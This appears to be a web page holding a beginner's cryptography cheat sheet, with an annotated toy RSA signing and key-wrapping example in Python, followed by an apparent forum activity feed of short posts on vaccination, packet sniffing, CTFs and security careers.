Message signing is also the basis of SSL/TLS certificate validation. A certificate contains a public key and identity information, plus a signature over both generated with the private key of a trusted certificate authority. An SSL/TLS client (such as a web browser) can confirm the authenticity of the public key by validating the certificate signature using the public key of the certificate authority that signed it.

A valid certificate only proves that the CA vouched for the key; the client still has to check that the server actually holds the matching private key. With RSA key exchange (TLS 1.2 and earlier) the client encrypts a random premaster secret with the public key in the server's certificate, and only a server holding the private key can recover it and derive the same session keys. With (EC)DHE key exchange, and always in TLS 1.3, the server instead proves possession of its private key by signing the handshake transcript.

"Self-signed" certificates are merely public keys signed with the corresponding private key. This isn't as trustworthy (assuming you have reasons to trust a certificate authority) but also doesn't require interaction with a certificate authority. However, ultimately the buck has to stop somewhere, and even certificate authority "root certificates" are self-signed; they are trusted because they are shipped in the operating system's or browser's trust store.

Rather than the centralized certificate authority model (where certain authorities are trusted to sign certificates), email encryption tools like GPG have a "web of trust" model where someone's public key can be signed by many other individuals or entities, so that if you trust at least some of those others it gives you greater assurance that a public key is valid and belongs to the indicated person. Without any such signatures, someone could presumably publish a key purporting to be someone else and there'd be no easy way to validate it.

4.3 secure email

If you want people to be able to send you secure email (such as with PGP, GPG, or S/MIME) you create a public key pair (K1, K2) and publish the public key K2.
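Signing a message hash (4.2) and wrapping a symmetric session key under a public key (the first step of the email flow in 4.3) with textbook RSA, added here as an example and not part of the cheat sheet. To keep the example deterministic and free of a primality test, the toy key's factors are two well-known Mersenne primes, 2^521-1 and 2^127-1; such a key has no security value whatsoever, and textbook RSA without padding (no PKCS#1 v1.5 or PSS) is likewise not safe to use for real signatures or key transport. The message and session key are constructed for the example.

```python
import hashlib
import os

# Toy key material: Mersenne primes so the key is fixed and needs no primality test.
# Anyone can factor this modulus by inspection; it exists only to make the math run.
P = (1 << 521) - 1
Q = (1 << 127) - 1
E = 65537


def toy_keypair():
    """Return ((e, n), (d, n)): the public and private halves of the toy RSA key."""
    n = P * Q
    phi = (P - 1) * (Q - 1)
    d = pow(E, -1, phi)          # modular inverse (Python 3.8+)
    return (E, n), (d, n)


def _digest_int(message: bytes) -> int:
    """Sign the hash, not the message: fixed size, and far smaller than n."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big")


def sign(private_key, message: bytes) -> int:
    """Textbook RSA signature: the hash raised to the private exponent mod n."""
    d, n = private_key
    return pow(_digest_int(message), d, n)


def verify(public_key, message: bytes, signature: int) -> bool:
    """Anyone with the public key reverses the signing operation and compares hashes."""
    e, n = public_key
    return pow(signature, e, n) == _digest_int(message)


def wrap_session_key(public_key, session_key: bytes) -> int:
    """4.3 step: the sender encrypts a random symmetric key to the recipient's public key.
    (Real systems pad with OAEP; raw RSA is deterministic and malleable.)"""
    e, n = public_key
    k = int.from_bytes(session_key, "big")
    if k >= n:
        raise ValueError("session key too large for this modulus")
    return pow(k, e, n)


def unwrap_session_key(private_key, wrapped: int, length: int) -> bytes:
    """The recipient recovers the symmetric key with the private exponent."""
    d, n = private_key
    return pow(wrapped, d, n).to_bytes(length, "big")


if __name__ == "__main__":
    public, private = toy_keypair()
    message = b"Gigel"                                   # constructed sample message
    sig = sign(private, message)
    print("signature valid:         ", verify(public, message, sig))
    print("valid after tampering:   ", verify(public, b"Gigel!", sig))
    session_key = os.urandom(32)                         # the per-message cipher key
    wrapped = wrap_session_key(public, session_key)
    print("session key round-trips: ", unwrap_session_key(private, wrapped, 32) == session_key)
```

The two operations are the same modular exponentiation with the exponents swapped, which is exactly the "one key reverses what the other does" property from 3.4; the security difference between signing and encryption in practice comes from the padding schemes and the key sizes, both omitted here.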
Someone who wants to send you mail picks a symmetric cipher and generates a unique, random key for that cipher. They encrypt their plaintext message with that cipher and key, encrypt the key with your public key, and send you a message containing the ciphertext, the cipher algorithm they used, and the encrypted cipher key. You decrypt the cipher key with your private key, and then decrypt their message from the ciphertext with the indicated cipher. Note that for this model to work, everyone who wants to receive encrypted email has to publish a public key.

4.4 SSL/TLS

SSL (Secure Sockets Layer, now deprecated) and TLS (Transport Layer Security) use all of the above cryptographic primitives to secure data sent over a network. As a result the protocol is rather complicated, but in summary it does these things:
- client and server agree on a "cipher suite" to use, which consists of:
  - a method for key exchange (via the public/private key pair in a certificate, or Diffie-Hellman key exchange)
  - a method for server validation (based on the public-key algorithm used in its certificate)
  - a symmetric cipher for bulk data encryption
  - a hash algorithm to use for message authentication, actually an HMAC or "Hashed Message Authentication Code" that hashes a combination of a secret key and the data. (Modern suites, and all of TLS 1.3, instead use an authenticated cipher such as AES-GCM or ChaCha20-Poly1305 that provides encryption and authentication together.)
- establish random shared keys for the symmetric cipher and HMAC using the specified key exchange method
- transmit data using the specified symmetric cipher and HMAC algorithms

5 Cryptanalysis

Cryptanalysis is the study of weaknesses in cryptographic algorithms and protocols. In general, good algorithms and protocols have been subjected to lots of public cryptanalysis that has not resulted in attacks that are significantly better than brute force.
It's a complex topic, and this is a pretty good introduction: https://research.checkpoint.com/cryptographic-attacks-a-guide-for-the-perplexed

6 Cryptographic tools

6.1 OpenSSL

Although it has taken a lot of heat for some of its previous security issues (particularly "Heartbleed"), it's still the most widely used cryptographic library because of its portability and completeness. The openssl command-line utility also provides a lot of useful functionality. It can be used to create certificate requests or even to sign certificates, encrypt/decrypt files, transform several kinds of file formats used for cryptographic data, and more. Of particular use is the openssl s_client command, which can initiate an SSL/TLS client connection, but more importantly shows a lot of useful debugging data about the protocol negotiation, including the certificate and cipher suite properties.

6.2 gnutls

The GNU Project's SSL/TLS library, which includes a gnutls-cli utility with similar (but less extensive) functionality for SSL/TLS client connections and encryption/decryption.

6.3 gnupg

Primarily intended for encrypting or decrypting secure mail messages, it also provides functionality for encrypting or decrypting files and for creating or validating signatures.

7 General cryptographic advice

7.1 Use established, publicly analyzed algorithms and tools

Schneier's Law: "Anyone can create an algorithm that they can't break." https://www.schneier.com/blog/archives/2011/04/schneiers_law.html

Resist the urge to create and use your own cryptographic algorithms and protocols. Cryptography is hard, and even expert cryptographers have created methods that, once exposed to public analysis, have turned out to be easy to break. The same applies to combining sound primitives in home-grown ways: most real-world failures are in the protocol or the implementation (key reuse, bad randomness, missing authentication), not in the cipher.

7.2 Zealously protect keys and credentials

Often the easiest way to break a cryptographic system is to find the keys being used. This may be easier than you think. What if you left that certificate private key in a publicly-readable file?
What if it's copied into backups that are available to other untrusted users, or committed to a source repository? Think carefully about how you handle and store that kind of sensitive material.

Source: https://cybercoastal.com/cryptography-cheat-sheet-for-beginners/
-
Pff, you removed the layer I added in Photoshop Microsoft Power!
-
Hi, there's nothing you can do with a botnet; our suggestion is to find something more useful to do. We're not in the 2000s anymore, let's evolve too.
-
Done, I've had the first dose of the vaccine. I barely felt it when they gave me the shot. I couldn't take a photo/video because the lady there didn't agree and I didn't insist. Everything was fine until I left, then I thought I wouldn't make it home alive... The Uber driver was driving like he was in a rally. I knew the vaccine affects the people around you too! I had no fever or other symptoms afterwards, none at all. Just a little pain at the injection site when pressing on the area.
-
Most likely you need to capture the packets with (SRC IP: yours and DST PORT 80) + (DST IP: yours and SRC PORT 80), i.e. the requests and the responses. I think it's enough if you look for packets on port 80 (both src and dst). Open the browser and type http://blabla.com - put that http:// in front to force the traffic over HTTP. And it should show up; just make sure the sniffing is done on the correct interface (eth0 or whatever it is).
-
Hi, I'm not sure I understood where you're having problems; it seems to me you're on the right track.
-
Example: https://portswigger.net/support/configuring-an-android-device-to-work-with-burp
-
Yes, I have another friend who had similar symptoms. PS: Don't do a "submarine" (a shot dropped into a pint) with beer and gin, it's brutal.
-
I'm getting vaccinated this week. It will be Pfizer. I didn't know that when I chose the centre, but for some time now the map of centres also shows which vaccine is used at each vaccination centre. I'll try to take a photo when I get vaccinated.
-
Hi, can someone help me with how to crack a wifi password
Nytro replied to sic067's topic in Programare
Honestly, instead of struggling like this, talk nicely to that lady and convince her that she pays for the internet anyway and has nothing to lose if you use it.
-
Hi, a small problem: those who sent me donations, please PM me with the name you sent under. The thing is, I don't know exactly which users sent them; I want to post the list of users who donated, not their names.
CTF details: April 17-18
Category: Beginners
Type: Individual
Prizes: 3500 RON+
Registration is open on the platform: https://ctf.rstforums.com/
If there are people who can help with exercises, not very difficult ones, I'm waiting for PMs.
-
I'm scheduled this week. I hope I can take a photo/video. Where did you get that 50% figure from? It sounds like Antena3/Romania TV/Realitatea or even ortodoxinfo. I just went on that garbage site; you need at most two years of school to read what's written there. You should pick some better sources of information or talk to some doctors. At least call your family doctor and see what they say. I suppose you don't have more educated friends to talk to, or doctors. I know doctors, and they and their families got vaccinated and they recommend everyone do so. But you still bring no arguments. Arguments. You know what I mean? That is, not idiotic ideas with no basis in reality. You have to believe what I say, I'm in charge of the New World Order. If you don't believe it, prove that I'm not.
-
Hi, it wouldn't be a bad move; demand for people in this field is growing, including in Romania. Interviews contain all kinds of questions, both general security questions from any branch of the field and, above all, questions about what each company in particular needs. I think most companies work with web applications, and there detailed knowledge of web vulnerabilities is required. I don't know how much a master's degree helps, at least in this country. It's good to have if it doesn't get in your way, if you only go there now and then and for exams. That's roughly how it is with security: there are jobs on the defensive side, attack analysis, SOC (Security Operations Center) and others where sysadmin knowledge helps, and the offensive side where the required skills are a bit different, but not by much - a little programming helps quite a lot here, protocols and many other things.
-
SUSPECTED. If someone gets vaccinated and subsequently dies, from any kind of medical condition, the vaccine is also taken into consideration. That doesn't mean the vaccine is to blame.
"99 social circumstances incl. 2 deaths
138 Surgical and medical procedures incl. 4 deaths
1,977 Eye disorders incl. 1 death
2,676 Metabolism and nutrition disorders incl. 5 deaths"
These are a few examples. Still, this vaccine is a real killer if it kills for all these kinds of reasons. Then:
- 4000 deaths POSSIBLY (though slim chances)
- 138 MILLION vaccinations
- Covid-19 deaths - 2.84 MILLION
Covid: Cases 130M 130,000,000 Recovered 73.9M 73,900,000 Deaths 2.84M 2,840,000
So, in short, for those who can't read:
- 130 million Covid cases result in 2.84 MILLION deaths. That is 2840000.
- 130 million anti-covid vaccinations result in MAYBE 4000 deaths. That is 4000.
Let's not get vaccinated, right? Many people without a basic sense of logic. You deserve your fate.
-
Hi, you can't decrypt it because it isn't encrypted. It's probably a binary format; those hex bytes have some meaning. It's hard to do "reversing" on such text; you can deduce certain things, but doing it completely is very hard. One solution would be to find out which program generates it; reverse engineering that program should tell you roughly what the file contains.
-
It's not nonsense, I'll prove it to you, I'll give you a link to register. And you can all register, it will rain money on you!!! PS: Just kidding, obviously. Yes, I have no idea whether anything can be done. I don't know whether it breaks any laws, nor what could be done about it, although it is a form of fraud. In the end, Darwin knew what he was talking about.
-
Supposedly the document was signed by certain doctors, except they don't know they did that. Pathetic, fake news. In fact you can tell the text was written by a Karen on the toilet, not by doctors.
-
Maybe this: https://chrome.google.com/webstore/detail/tweetbot-marketing-bot-fo/lnafpokcmhignpnlaphmibphikenilin?hl=en
-
Option 1: Install a virtual machine with Linux: free
Option 2: Buy a VPS from DigitalOcean or Vultr: $5 per month